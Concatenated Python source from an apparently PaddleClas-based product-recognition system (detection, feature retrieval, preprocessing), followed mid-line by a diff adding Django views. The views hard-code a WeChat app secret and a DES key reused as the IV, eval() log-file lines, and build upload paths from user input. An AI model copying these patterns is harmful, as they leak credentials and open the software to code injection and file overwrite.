            preds["bbox"] = [xmin, ymin, xmax, ymax]
            scores, docs = self.Searcher.search(rec_results, self.return_k)

            # just top-1 result will be returned for the final
            if scores[0][0] >= self.config["IndexProcess"]["score_thres"]:
                preds["rec_docs"] = self.id_map[docs[0][0]].split()[1]
                preds["rec_scores"] = scores[0][0]
                output.append(preds)

        # st4: nms on the final results to avoid fetching duplicate results
        # (config key "rec_nms_thresold" [sic] is the existing contract)
        output = self.nms_to_rec_results(
            output, self.config["Global"]["rec_nms_thresold"])

        return output


def main(config):
    system_predictor = SystemPredictor(config)
    image_list = get_image_list(config["Global"]["infer_imgs"])
    assert config["Global"]["batch_size"] == 1

    log_path = '/root/Smart_container/PaddleClas/dataset/log_client.txt'
    output = []
    for idx, image_file in enumerate(image_list):
        img = cv2.imread(image_file)[:, :, ::-1]  # BGR -> RGB
        output = system_predictor.predict(img)
        print(output)
        draw_bbox_results(img, output, image_file)

        if not output:
            i = "Please connect root to upload container's name and it's price!"
            # BUGFIX: `with` already closes the file; dropped the redundant
            # f.close() and reuse one handle per image instead of per line.
            with open(log_path, 'a+', encoding='utf8') as f:
                f.write(str(i) + '\n')
        else:
            with open(log_path, 'a+', encoding='utf8') as f:
                for i in output:
                    f.write(str(i) + '\n')
                    print(i)
    # NOTE(review): original return placement was ambiguous in the mangled
    # source; returning the last image's output preserves the asserted
    # single-image (batch_size == 1) use case -- confirm against callers.
    return output


if __name__ == "__main__":
    args = config.parse_args()
    config = config.get_config(args.config, overrides=args.override, show=True)
    main(config)
# NOTE(review): this block relies on module-level imports declared at the
# top of this file: time, numpy as np, cv2, functools.reduce, Predictor,
# config, get_image_list, det_preprocess, create_operators.


class DetPredictor(Predictor):
    """Paddle-inference wrapper for the object detection model."""

    def __init__(self, config):
        super().__init__(config["Global"],
                         config["Global"]["det_inference_model_dir"])

        self.preprocess_ops = create_operators(config["DetPreProcess"][
            "transform_ops"])
        self.config = config

    def preprocess(self, img):
        """Run the configured preprocess ops and pack the model input dict."""
        # BUGFIX: 'scale_factor' appeared twice in this dict literal with
        # the same value; the duplicate entry has been removed.
        im_info = {
            'scale_factor': np.array(
                [1., 1.], dtype=np.float32),
            'im_shape': np.array(
                img.shape[:2], dtype=np.float32),
            'input_shape': self.config["Global"]["image_shape"],
        }
        im, im_info = det_preprocess(img, im_info, self.preprocess_ops)
        inputs = self.create_inputs(im, im_info)
        return inputs

    def create_inputs(self, im, im_info):
        """Generate the feed dict for the detector.

        Args:
            im (np.ndarray): preprocessed CHW image.
            im_info (dict): info of image ('im_shape', 'scale_factor').
        Returns:
            dict: named input arrays, batched with a leading axis of 1.
        """
        inputs = {}
        inputs['image'] = np.array((im, )).astype('float32')
        inputs['im_shape'] = np.array(
            (im_info['im_shape'], )).astype('float32')
        inputs['scale_factor'] = np.array(
            (im_info['scale_factor'], )).astype('float32')

        return inputs

    def parse_det_results(self, pred, threshold, label_list):
        """Keep the highest-scoring boxes above `threshold`.

        Args:
            pred (np.ndarray): rows of [class, score, x1, y1, x2, y2].
            threshold (float): minimum score.
            label_list (list): class-id -> name mapping.
        Returns:
            list[dict]: one dict per kept box.
        """
        max_det_results = self.config["Global"]["max_det_results"]
        keep_indexes = pred[:, 1].argsort()[::-1][:max_det_results]
        results = []
        for idx in keep_indexes:
            single_res = pred[idx]
            class_id = int(single_res[0])
            score = single_res[1]
            bbox = single_res[2:]
            if score < threshold:
                continue
            label_name = label_list[class_id]
            results.append({
                "class_id": class_id,
                "score": score,
                "bbox": bbox,
                "label_name": label_name,
            })
        return results

    def predict(self, image, threshold=0.5, run_benchmark=False):
        '''
        Args:
            image (str/np.ndarray): path of image/ np.ndarray read by cv2
            threshold (float): threshold of predicted box' score
        Returns:
            results (dict): include 'boxes': np.ndarray: shape:[N,6], N: number of box,
                            matix element:[class, score, x_min, y_min, x_max, y_max]
        '''
        inputs = self.preprocess(image)
        np_boxes = None
        input_names = self.paddle_predictor.get_input_names()

        for i in range(len(input_names)):
            input_tensor = self.paddle_predictor.get_input_handle(input_names[
                i])
            input_tensor.copy_from_cpu(inputs[input_names[i]])

        t1 = time.time()
        self.paddle_predictor.run()
        output_names = self.paddle_predictor.get_output_names()
        boxes_tensor = self.paddle_predictor.get_output_handle(output_names[0])
        np_boxes = boxes_tensor.copy_to_cpu()
        t2 = time.time()

        print("Inference: {} ms per batch image".format((t2 - t1) * 1000.0))

        # fewer than 6 values means no [class, score, x1, y1, x2, y2] row
        results = []
        if reduce(lambda x, y: x * y, np_boxes.shape) < 6:
            print('[WARNNING] No object detected.')
            results = np.array([])
        else:
            results = np_boxes

        # NOTE(review): "labe_list" [sic] is the existing config key --
        # renaming it would break every deployed config file.
        results = self.parse_det_results(results,
                                         self.config["Global"]["threshold"],
                                         self.config["Global"]["labe_list"])
        return results


def main(config):
    det_predictor = DetPredictor(config)
    image_list = get_image_list(config["Global"]["infer_imgs"])

    assert config["Global"]["batch_size"] == 1
    for idx, image_file in enumerate(image_list):
        img = cv2.imread(image_file)[:, :, ::-1]  # BGR -> RGB
        output = det_predictor.predict(img)
        print(output)

    return


if __name__ == "__main__":
    args = config.parse_args()
    config = config.get_config(args.config, overrides=args.override, show=True)
    main(config)
# NOTE(review): this block relies on module-level imports declared at the
# top of this file: os, cv2, numpy as np, logger, config, Predictor,
# get_image_list, create_operators, build_postprocess.


class RecPredictor(Predictor):
    """Paddle-inference wrapper for the recognition (feature) model."""

    def __init__(self, config):
        super().__init__(config["Global"],
                         config["Global"]["rec_inference_model_dir"])
        self.preprocess_ops = create_operators(config["RecPreProcess"][
            "transform_ops"])
        self.postprocess = build_postprocess(config["RecPostProcess"])

    def predict(self, images, feature_normalize=True):
        """Extract features for one image or a list of images.

        Args:
            images (np.ndarray|list): single HWC image or list of images.
            feature_normalize (bool): L2-normalize each output row.
        Returns:
            np.ndarray: batch of feature vectors (postprocessed if a
            postprocess is configured).
        """
        input_names = self.paddle_predictor.get_input_names()
        input_tensor = self.paddle_predictor.get_input_handle(input_names[0])

        output_names = self.paddle_predictor.get_output_names()
        output_tensor = self.paddle_predictor.get_output_handle(output_names[
            0])

        if not isinstance(images, (list, )):
            images = [images]
        # BUGFIX: build a new list instead of overwriting the caller's list
        # elements in place (the old loop mutated `images[idx]`).
        batch = []
        for img in images:
            for ops in self.preprocess_ops:
                img = ops(img)
            batch.append(img)
        image = np.array(batch)

        input_tensor.copy_from_cpu(image)
        self.paddle_predictor.run()
        batch_output = output_tensor.copy_to_cpu()

        if feature_normalize:
            feas_norm = np.sqrt(
                np.sum(np.square(batch_output), axis=1, keepdims=True))
            batch_output = np.divide(batch_output, feas_norm)

        if self.postprocess is not None:
            batch_output = self.postprocess(batch_output)
        return batch_output


def main(config):
    rec_predictor = RecPredictor(config)
    image_list = get_image_list(config["Global"]["infer_imgs"])

    batch_imgs = []
    batch_names = []
    cnt = 0
    for idx, img_path in enumerate(image_list):
        img = cv2.imread(img_path)
        if img is None:
            logger.warning(
                "Image file failed to read and has been skipped. The path: {}".
                format(img_path))
        else:
            img = img[:, :, ::-1]  # BGR -> RGB
            batch_imgs.append(img)
            img_name = os.path.basename(img_path)
            batch_names.append(img_name)
            cnt += 1

        # flush a full batch, or the remainder at the end of the list
        if cnt % config["Global"]["batch_size"] == 0 or (idx + 1
                                                         ) == len(image_list):
            if len(batch_imgs) == 0:
                continue

            batch_results = rec_predictor.predict(batch_imgs)
            for number, result_dict in enumerate(batch_results):
                filename = batch_names[number]
                print("{}:\t{}".format(filename, result_dict))
            batch_imgs = []
            batch_names = []

    return


if __name__ == "__main__":
    args = config.parse_args()
    config = config.get_config(args.config, overrides=args.override, show=True)
    main(config)
# NOTE(review): this block relies on module-level imports declared at the
# top of this file: os, pickle, cv2, faiss, numpy as np, utils.config,
# draw_bbox_results, get_image_list, DetPredictor, RecPredictor.
# It is a near-duplicate of predict_client.py; kept consistent with it.


class SystemPredictor(object):
    """Detection + retrieval pipeline: detect boxes, embed each crop with the
    recognition model, and look the embedding up in a faiss index."""

    def __init__(self, config):
        self.config = config
        self.rec_predictor = RecPredictor(config)
        self.det_predictor = DetPredictor(config)

        assert 'IndexProcess' in config.keys(), "Index config not found ... "
        self.return_k = self.config['IndexProcess']['return_k']

        index_dir = self.config["IndexProcess"]["index_dir"]
        assert os.path.exists(os.path.join(
            index_dir, "vector.index")), "vector.index not found ..."
        assert os.path.exists(os.path.join(
            index_dir, "id_map.pkl")), "id_map.pkl not found ... "

        if config['IndexProcess'].get("binary_index", False):
            self.Searcher = faiss.read_index_binary(
                os.path.join(index_dir, "vector.index"))
        else:
            self.Searcher = faiss.read_index(
                os.path.join(index_dir, "vector.index"))

        with open(os.path.join(index_dir, "id_map.pkl"), "rb") as fd:
            self.id_map = pickle.load(fd)

    def append_self(self, results, shape):
        """Append a whole-image pseudo-detection to improve recall."""
        results.append({
            "class_id": 0,
            "score": 1.0,
            "bbox":
            np.array([0, 0, shape[1], shape[0]]),  # xmin, ymin, xmax, ymax
            "label_name": "foreground",
        })
        return results

    def nms_to_rec_results(self, results, thresh=0.1):
        """Greedy IoU-based NMS over recognition results, highest
        `rec_scores` first; drops boxes overlapping a kept box by > thresh."""
        filtered_results = []
        x1 = np.array([r["bbox"][0] for r in results]).astype("float32")
        y1 = np.array([r["bbox"][1] for r in results]).astype("float32")
        x2 = np.array([r["bbox"][2] for r in results]).astype("float32")
        y2 = np.array([r["bbox"][3] for r in results]).astype("float32")
        scores = np.array([r["rec_scores"] for r in results])

        areas = (x2 - x1 + 1) * (y2 - y1 + 1)
        order = scores.argsort()[::-1]
        while order.size > 0:
            i = order[0]
            xx1 = np.maximum(x1[i], x1[order[1:]])
            yy1 = np.maximum(y1[i], y1[order[1:]])
            xx2 = np.minimum(x2[i], x2[order[1:]])
            yy2 = np.minimum(y2[i], y2[order[1:]])

            w = np.maximum(0.0, xx2 - xx1 + 1)
            h = np.maximum(0.0, yy2 - yy1 + 1)
            inter = w * h
            ovr = inter / (areas[i] + areas[order[1:]] - inter)
            inds = np.where(ovr <= thresh)[0]
            order = order[inds + 1]
            filtered_results.append(results[i])

        return filtered_results

    def predict(self, img):
        """Full pipeline for one RGB image; returns recognized results."""
        output = []
        # st1: get all detection results
        results = self.det_predictor.predict(img)

        # st2: add the whole image for recognition to improve recall
        results = self.append_self(results, img.shape)

        # st3: recognition process, use score_thres to ensure accuracy
        for result in results:
            preds = {}
            xmin, ymin, xmax, ymax = result["bbox"].astype("int")
            crop_img = img[ymin:ymax, xmin:xmax, :].copy()
            rec_results = self.rec_predictor.predict(crop_img)
            preds["bbox"] = [xmin, ymin, xmax, ymax]
            scores, docs = self.Searcher.search(rec_results, self.return_k)

            # just top-1 result will be returned for the final
            if scores[0][0] >= self.config["IndexProcess"]["score_thres"]:
                preds["rec_docs"] = self.id_map[docs[0][0]].split()[1]
                preds["rec_scores"] = scores[0][0]
                output.append(preds)

        # st4: nms on the final results to avoid fetching duplicate results
        # (config key "rec_nms_thresold" [sic] is the existing contract)
        output = self.nms_to_rec_results(
            output, self.config["Global"]["rec_nms_thresold"])

        return output


def main(config):
    system_predictor = SystemPredictor(config)
    image_list = get_image_list(config["Global"]["infer_imgs"])

    assert config["Global"]["batch_size"] == 1
    log_path = '/root/Smart_container/PaddleClas/dataset/log.txt'
    output = []
    for idx, image_file in enumerate(image_list):
        img = cv2.imread(image_file)[:, :, ::-1]  # BGR -> RGB
        output = system_predictor.predict(img)

        draw_bbox_results(img, output, image_file)
        if not output:
            i = "Please connect root to upload container's name and it's price!"
            # BUGFIX: `with` already closes the file; dropped the redundant
            # f.close() and reuse one handle per image instead of per line.
            with open(log_path, 'a+', encoding='utf8') as f:
                f.write(str(i) + '\n')
        else:
            with open(log_path, 'a+', encoding='utf8') as f:
                for i in output:
                    f.write(str(i) + '\n')
    # NOTE(review): original return placement was ambiguous in the mangled
    # source; returning the last image's output preserves the asserted
    # single-image (batch_size == 1) use case -- confirm against callers.
    return output


if __name__ == "__main__":
    args = config.parse_args()
    config = config.get_config(args.config, overrides=args.override, show=True)
    main(config)
# NOTE(review): this block relies on module-level imports declared at the
# top of this file: functools.partial, six, math, random, cv2,
# numpy as np, importlib, PIL.Image, and the Det* ops from det_preprocess.


def create_operators(params):
    """Create preprocess operators from a config list.

    Args:
        params (list): list of single-key dicts, {OpName: kwargs-or-None}.
    Returns:
        list: instantiated operator objects from this module.
    """
    assert isinstance(params, list), ('operator config should be a list')
    mod = importlib.import_module(__name__)
    ops = []
    for operator in params:
        assert isinstance(operator,
                          dict) and len(operator) == 1, "yaml format error"
        op_name = list(operator)[0]
        param = {} if operator[op_name] is None else operator[op_name]
        op = getattr(mod, op_name)(**param)
        ops.append(op)

    return ops


class UnifiedResize(object):
    """Resize helper unifying the cv2 and PIL backends.

    Args:
        interpolation (str|int|None): interpolation name or backend constant.
        backend (str): "cv2" or "pil"; anything else falls back to cv2.
    """

    def __init__(self, interpolation=None, backend="cv2"):
        _cv2_interp_from_str = {
            'nearest': cv2.INTER_NEAREST,
            'bilinear': cv2.INTER_LINEAR,
            'area': cv2.INTER_AREA,
            'bicubic': cv2.INTER_CUBIC,
            'lanczos': cv2.INTER_LANCZOS4
        }
        _pil_interp_from_str = {
            'nearest': Image.NEAREST,
            'bilinear': Image.BILINEAR,
            'bicubic': Image.BICUBIC,
            'box': Image.BOX,
            'lanczos': Image.LANCZOS,
            'hamming': Image.HAMMING
        }

        def _pil_resize(src, size, resample):
            pil_img = Image.fromarray(src)
            pil_img = pil_img.resize(size, resample)
            return np.asarray(pil_img)

        if backend.lower() == "cv2":
            if isinstance(interpolation, str):
                interpolation = _cv2_interp_from_str[interpolation.lower()]
            # compatible with opencv < version 4.4.0
            elif not interpolation:
                interpolation = cv2.INTER_LINEAR
            self.resize_func = partial(cv2.resize, interpolation=interpolation)
        elif backend.lower() == "pil":
            if isinstance(interpolation, str):
                interpolation = _pil_interp_from_str[interpolation.lower()]
            self.resize_func = partial(_pil_resize, resample=interpolation)
        else:
            # BUGFIX: original referenced an undefined `logger` (NameError)
            # and mis-placed the f-string brace ("f{backend}"); use the
            # stdlib warnings module and fall back to cv2 as intended.
            import warnings
            warnings.warn(
                f"The backend of Resize only support \"cv2\" or \"PIL\". \"{backend}\" is unavailable. Use \"cv2\" instead."
            )
            self.resize_func = cv2.resize

    def __call__(self, src, size):
        return self.resize_func(src, size)


class OperatorParamError(ValueError):
    """Raised when an operator is configured with invalid parameters."""
    pass


class DecodeImage(object):
    """Decode raw image bytes into an ndarray (BGR, optionally RGB/CHW)."""

    def __init__(self, to_rgb=True, to_np=False, channel_first=False):
        self.to_rgb = to_rgb
        self.to_np = to_np  # to numpy
        self.channel_first = channel_first  # only enabled when to_np is True

    def __call__(self, img):
        if six.PY2:
            assert type(img) is str and len(
                img) > 0, "invalid input 'img' in DecodeImage"
        else:
            assert type(img) is bytes and len(
                img) > 0, "invalid input 'img' in DecodeImage"
        data = np.frombuffer(img, dtype='uint8')
        img = cv2.imdecode(data, 1)  # BGR
        if self.to_rgb:
            assert img.shape[2] == 3, 'invalid shape of image[%s]' % (
                img.shape)
            img = img[:, :, ::-1]

        if self.channel_first:
            img = img.transpose((2, 0, 1))

        return img


class ResizeImage(object):
    """Resize to an exact (w, h), or scale the short side to `resize_short`."""

    def __init__(self,
                 size=None,
                 resize_short=None,
                 interpolation=None,
                 backend="cv2"):
        if resize_short is not None and resize_short > 0:
            self.resize_short = resize_short
            self.w = None
            self.h = None
        elif size is not None:
            self.resize_short = None
            self.w = size if type(size) is int else size[0]
            self.h = size if type(size) is int else size[1]
        else:
            # BUGFIX: message had a typo ("ReisizeImage") and broken quoting
            raise OperatorParamError(
                "invalid params for ResizeImage: "
                "both 'size' and 'resize_short' are None")

        self._resize_func = UnifiedResize(
            interpolation=interpolation, backend=backend)

    def __call__(self, img):
        img_h, img_w = img.shape[:2]
        if self.resize_short is not None:
            percent = float(self.resize_short) / min(img_w, img_h)
            w = int(round(img_w * percent))
            h = int(round(img_h * percent))
        else:
            w = self.w
            h = self.h
        return self._resize_func(img, (w, h))


class CropImage(object):
    """Center-crop an HWC image to `size` (h, w)."""

    def __init__(self, size):
        if type(size) is int:
            self.size = (size, size)
        else:
            self.size = size  # (h, w)

    def __call__(self, img):
        w, h = self.size
        img_h, img_w = img.shape[:2]

        if img_h < h or img_w < w:
            # BUGFIX: the original message stated the comparison backwards
            raise Exception(
                f"The size({img_h}, {img_w}) of image must be no smaller than the crop size({h}, {w}). Please check image original size and size of ResizeImage if used."
            )

        w_start = (img_w - w) // 2
        h_start = (img_h - h) // 2

        w_end = w_start + w
        h_end = h_start + h
        return img[h_start:h_end, w_start:w_end, :]


class RandCropImage(object):
    """Random-resized crop: sample area scale and aspect ratio, then resize."""

    def __init__(self,
                 size,
                 scale=None,
                 ratio=None,
                 interpolation=None,
                 backend="cv2"):
        if type(size) is int:
            self.size = (size, size)  # (h, w)
        else:
            self.size = size

        self.scale = [0.08, 1.0] if scale is None else scale
        self.ratio = [3. / 4., 4. / 3.] if ratio is None else ratio

        self._resize_func = UnifiedResize(
            interpolation=interpolation, backend=backend)

    def __call__(self, img):
        size = self.size
        scale = self.scale
        ratio = self.ratio

        aspect_ratio = math.sqrt(random.uniform(*ratio))
        w = 1. * aspect_ratio
        h = 1. / aspect_ratio

        img_h, img_w = img.shape[:2]

        # cap the scale so the sampled crop always fits inside the image
        bound = min((float(img_w) / img_h) / (w**2),
                    (float(img_h) / img_w) / (h**2))
        scale_max = min(scale[1], bound)
        scale_min = min(scale[0], bound)

        target_area = img_w * img_h * random.uniform(scale_min, scale_max)
        target_size = math.sqrt(target_area)
        w = int(target_size * w)
        h = int(target_size * h)

        i = random.randint(0, img_w - w)
        j = random.randint(0, img_h - h)

        img = img[j:j + h, i:i + w, :]

        return self._resize_func(img, size)


class RandFlipImage(object):
    """Randomly flip an image with probability 0.5.

    flip_code:
        1: Flipped Horizontally
        0: Flipped Vertically
        -1: Flipped Horizontally & Vertically
    """

    def __init__(self, flip_code=1):
        assert flip_code in [-1, 0, 1
                             ], "flip_code should be a value in [-1, 0, 1]"
        self.flip_code = flip_code

    def __call__(self, img):
        if random.randint(0, 1) == 1:
            return cv2.flip(img, self.flip_code)
        else:
            return img


class AutoAugment(object):
    """Apply an ImageNet AutoAugment policy.

    NOTE(review): `ImageNetPolicy` is not imported anywhere in this module,
    so constructing this class raises NameError -- TODO: add the import.
    """

    def __init__(self):
        self.policy = ImageNetPolicy()

    def __call__(self, img):
        from PIL import Image
        img = np.ascontiguousarray(img)
        img = Image.fromarray(img)
        img = self.policy(img)
        img = np.asarray(img)
        # BUGFIX: the original was missing this return (it returned None,
        # which would wipe the image out of the preprocess pipeline).
        return img


class NormalizeImage(object):
    """Normalize an image: img * scale, subtract mean, divide std.

    Optionally pads a zero 4th channel and/or emits float16.
    """

    def __init__(self,
                 scale=None,
                 mean=None,
                 std=None,
                 order='chw',
                 output_fp16=False,
                 channel_num=3):
        if isinstance(scale, str):
            # NOTE(review): eval() on a config-supplied string (e.g.
            # "1.0/255.0") -- acceptable only for trusted config files.
            scale = eval(scale)
        assert channel_num in [
            3, 4
        ], "channel number of input image should be set to 3 or 4."
        self.channel_num = channel_num
        self.output_dtype = 'float16' if output_fp16 else 'float32'
        self.scale = np.float32(scale if scale is not None else 1.0 / 255.0)
        self.order = order
        mean = mean if mean is not None else [0.485, 0.456, 0.406]
        std = std if std is not None else [0.229, 0.224, 0.225]

        shape = (3, 1, 1) if self.order == 'chw' else (1, 1, 3)
        self.mean = np.array(mean).reshape(shape).astype('float32')
        self.std = np.array(std).reshape(shape).astype('float32')

    def __call__(self, img):
        from PIL import Image
        if isinstance(img, Image.Image):
            img = np.array(img)

        assert isinstance(img,
                          np.ndarray), "invalid input 'img' in NormalizeImage"

        img = (img.astype('float32') * self.scale - self.mean) / self.std

        if self.channel_num == 4:
            img_h = img.shape[1] if self.order == 'chw' else img.shape[0]
            img_w = img.shape[2] if self.order == 'chw' else img.shape[1]
            pad_zeros = np.zeros(
                (1, img_h, img_w)) if self.order == 'chw' else np.zeros(
                    (img_h, img_w, 1))
            img = (np.concatenate(
                (img, pad_zeros), axis=0)
                   if self.order == 'chw' else np.concatenate(
                       (img, pad_zeros), axis=2))
        return img.astype(self.output_dtype)


class ToCHWImage(object):
    """Convert an HWC image to CHW layout."""

    def __init__(self):
        pass

    def __call__(self, img):
        from PIL import Image
        if isinstance(img, Image.Image):
            img = np.array(img)

        return img.transpose((2, 0, 1))
s in result: + + if rec_docs_list == s[1]: + print(s[1]) + print(s[2]) + containers.append(s[1]) + price.append(s[2]) +print(price) +db.commit() +cur.close() +db.close() \ No newline at end of file diff --git a/Smart_container/PaddleClas/deploy/python/test.py b/Smart_container/PaddleClas/deploy/python/test.py new file mode 100644 index 0000000..44dd28c --- /dev/null +++ b/Smart_container/PaddleClas/deploy/python/test.py @@ -0,0 +1,383 @@ +#图片处理 +import base64 +import binascii +import hashlib +import json +import os +from typing import Container + +import memcache +import pymysql +import requests +from django.http import JsonResponse +from django.shortcuts import HttpResponse, render +#检索 +from fuzzywuzzy import fuzz, process +#登陆用 +from pyDes import CBC, PAD_PKCS5, des +from xpinyin import Pinyin + +# 数据库相关操作 +from app01 import models + +# Create your views here. + +KEY='mHAxsLYz' #秘钥 +PICTURE_ROOT = '/root/Smart_container/PaddleClas/dataset/retail' + +def des_encrypt(s): + """ + DES 加密 + :param s: 原始字符串 + :return: 加密后字符串,16进制 + """ + secret_key = KEY + iv = secret_key + k = des(secret_key, CBC, iv, pad=None, padmode=PAD_PKCS5) + en = k.encrypt(s, padmode=PAD_PKCS5) + return binascii.b2a_hex(en) + + +def des_descrypt(s): + """ + DES 解密 + :param s: 加密后的字符串,16进制 + :return: 解密后的字符串 + """ + secret_key = KEY + iv = secret_key + k = des(secret_key, CBC, iv, pad=None, padmode=PAD_PKCS5) + de = k.decrypt(binascii.a2b_hex(s), padmode=PAD_PKCS5) + sessionID = de.split('_') + openid = sessionID[0] + return openid + + +def SKexpired(old_sessionID, code): + + s_openid = des_descrypt(old_sessionID) + + appid = "wx433732b2940b7d4c" + secret = "b4e95c5b998cd13ba9d09e077343f2e7" + code2SessionUrl = "https://api.weixin.qq.com/sns/jscode2session?appid={appid}&secret={secret}&js_code={code}&grant_type=authorization_code".format( + appid=appid, secret=secret, code=code) + resp = requests.get(code2SessionUrl) + respDict = resp.json() + s_session_key = respDict.get("session_key") + + s = 
str(s_openid) + '_' +str(s_session_key) + sessionID = des_encrypt(s) + + models.TUser.objects.filter(openid=s_openid).update(session_key=s_session_key) + + return sessionID + + + +def information(): + container = models.TContainer.objects.all() + + container_all = [] + for i in container: + temp = [] + temp.append(i.number) + temp.append(i.container_name) + temp.append(i.container_price) + temp.append(i.picture_address) + container_all.append(temp) + + return container_all + + +def update(): + container_all = information() + + TXT_PATH='/root/Smart_container/PaddleClas/dataset/retail/data_update.txt' + + with open(os.path.abspath(TXT_PATH),'w+',encoding='utf-8') as fh: + + for container_single in container_all: + container_name = container_single[1] + container_address = container_single[3] + + fh.write(container_address + '\t' + container_name + '\n') + fh.close() + #有问题要修改 + os.system('python3 python/build_gallery.py -c configs/build_product.yaml -o IndexProcess.data_file="/root/Smart_container/PaddleClas/dataset/retail/data_update.txt" -o IndexProcess.index_dir="/root/Smart_container/PaddleClas/dataset/retail/index_update"') + + +# 识别模块 +def reference(request): + if request.method == "POST": + sessionID = request.POST.get('sessionID') + isSKexpried = request.POST.get('isSKexpried') + code = request.POST.get('code') + value = request.POST.get('picture') + + res_all = models.TContainer.objects.all() + + if isSKexpried: + sessionID = SKexpired(sessionID, code) + + image_name = base64.b64decode(value) + + print(image_name) + + image_file = '/root/Smart_container/PaddleClas/dataset/retail/test1.jpg' + with open(image_file, "wb") as fh: + fh.write(image_name) + fh.close() + +### 商品识别 + + rec_docs_list = [] + + rec_docs_price_all = [] + + price_all = 0.0 + + # self.picture_file = '/home/thomas/Smart_container/PaddleClas/dataset/retail/test.jpg' + # + # cv2.imwrite(self.picture_file, self.image) + + os.system( + 'python 
/root/Smart_container/PaddleClas/deploy/python/predict_system.py -c /root/Smart_container/PaddleClas/deploy/configs/inference_product.yaml -o Global.use_gpu=False') + print('3') + log_path = '/root/Smart_container/PaddleClas/dataset/log.txt' + + + rec_docs_str = '' + rec_deplay_str = '' + + with open(log_path, 'r', encoding='utf8') as F: + + str_result_list = F.readlines() + print(str_result_list) + + if str_result_list[0] == "Please connect root to upload container's name and it's price!": + + rec_deplay_str_all = str_result_list[0] + + else: + + for str_result in str_result_list: + + price_all = 0 + + rec_docs_price = [] + + dict_result = eval(str_result) + + rec_docs = dict_result['rec_docs'] # 结果 + rec_docs_list.append(rec_docs) + print('2') + print(rec_docs_list) + for res in res_all: + for rec_docs_sig in rec_docs_list: + if rec_docs_sig == res.container_name: + rec_price = res.container_price + price_all += float(rec_price) + rec_docs_price.append(rec_docs) + rec_docs_price.append(rec_price) + rec_docs_price_all.append(rec_docs_price) + + + # print("1") + # print(rec_docs_price_all) + os.remove(log_path) + return JsonResponse({"state": 'true',"container": rec_docs_price_all,"price_all": price_all}) + else: + return JsonResponse({"state": 'false'}) + + + +#登录 + +def login_in(request): + if request.method == "POST": + code = request.POST.get('code') + userinfo = request.POST.get('userinfo') + userinfo = json.loads(userinfo) + s_nickname = userinfo['nickName'] + + appid = "wx433732b2940b7d4c" + secret = "b4e95c5b998cd13ba9d09e077343f2e7" + code2SessionUrl = "https://api.weixin.qq.com/sns/jscode2session?appid={appid}&secret={secret}&js_code={code}&grant_type=authorization_code".format( + appid=appid, secret=secret, code=code) + resp = requests.get(code2SessionUrl) + respDict = resp.json() + s_openid = respDict.get("openid") #需要存入的openid + s_session_key = respDict.get("session_key") #需要存入的session_key + + s = str(s_openid) + '_' +str(s_session_key) + sessionID = 
des_encrypt(s) + sessionID = str(sessionID) + + old_openid = models.TUser.objects.filter(openid=s_openid) #old_openid是查询数据库中是否有s_openid,无为空 + old_openid = old_openid.values() + if not bool(old_openid): #判断表中是否还有对应openid + s_user = models.TUser(openid = s_openid, nickname = s_nickname, session_key = s_session_key) + s_user.save() + update() + else: + models.TUser.objects.filter(openid=s_openid).update(session_key=s_session_key) #替换session_key + + + return JsonResponse({"sessionID": sessionID}) + + + +def record(request): #增加模块 + if request.method == "POST": + sessionID = request.POST.get('sessionID') + isSKexpried = request.POST.get('isSKexpried') + code = request.POST.get('code') + s_container_name = request.POST.get('container_name') #商品名称 str + s_container_price = request.POST.get('container_price') #商品单价 float + + picture = request.FILES['productimage'] #照片 + + if isSKexpried: + sessionID = SKexpired(sessionID, code) + + value_name = s_container_name + + + p = Pinyin() + name = p.get_pinyin(value_name).replace('-','') + + s_picture_address = 'gallery/'+ name + '.jpg' + + with open(os.path.join(PICTURE_ROOT,s_picture_address), 'wb') as fh: + for chunk in picture.chunks(): + fh.write(chunk) + fh.close() + + last_data = models.TContainer.objects.last() #查询t_container表中最后一条数据,以便于商品录入排序 + if not bool(last_data.number): + s_number = 1 #序号 + else: + s_number = last_data.number + 1 + + old_container = models.TContainer.objects.filter(container_name=s_container_name) + old_container = old_container.values() + + if not bool(old_container): + + s_container = models.TContainer(number = s_number, container_name = s_container_name, container_price = s_container_price,picture_address = s_picture_address) + s_container.save() + + update() + + return JsonResponse({"state": 'true', "sessionID": sessionID}) + else: + return JsonResponse({"state": 'true', "sessionID": sessionID}) + else: + return JsonResponse({"state": 'false'}) + + + +def delete(request): #删除模块 + if request.method 
== "POST": + sessionID = request.POST.get('sessionID') + isSKexpried = request.POST.get('isSKexpried') + code = request.POST.get('code') + d_number = request.POST.get('number') + d_container_name = request.POST.get('container_name') + + if isSKexpried: + sessionID = SKexpired(sessionID, code) + + d_number = int(d_number) + old_container = models.TContainer.objects.filter(number = d_number) #查询t_container表中所有数据,判断表中是否已经包含目标商品 + old_container = old_container.values() + + if not bool(old_container): #表内不含待删除商品 + return JsonResponse({"state": 'false', "sessionID": sessionID}) + else: + models.TContainer.objects.filter(number = d_number).delete() + + update() + + return JsonResponse({"state": 'true', "sessionID": sessionID}) + else: + return JsonResponse({"state": 'false'}) + + +def replace(request): #修改模块 + if request.method == "POST": + sessionID = request.POST.get('sessionID') + isSKexpried = request.POST.get('isSKexpried') + code = request.POST.get('code') + number = request.POST.get('number') + r_container_name = request.POST.get('container_name') + r_container_price = request.POST.get('container_price') + r_picture = request.FILES['productimage'] + # print(r_container_name) + + + if isSKexpried: + sessionID = SKexpired(sessionID, code) + + models.TContainer.objects.filter(number = number).update(container_name = r_container_name) + models.TContainer.objects.filter(number = number).update(container_price = r_container_price) + + g = models.TContainer.objects.filter(number = number) + + result = models.TContainer.objects.filter(number = number) + + with open(os.path.join(PICTURE_ROOT,result[0].picture_address), 'wb') as fh: + for chunk in r_picture.chunks(): + fh.write(chunk) + fh.close() + + update() + + return JsonResponse({"state": 'true', "sessionID": sessionID}) + else: + return JsonResponse({"state": 'false'}) + + + +def search(request): #查询模块 + if request.method == "POST": + sessionID = request.POST.get('sessionID') + isSKexpried = 
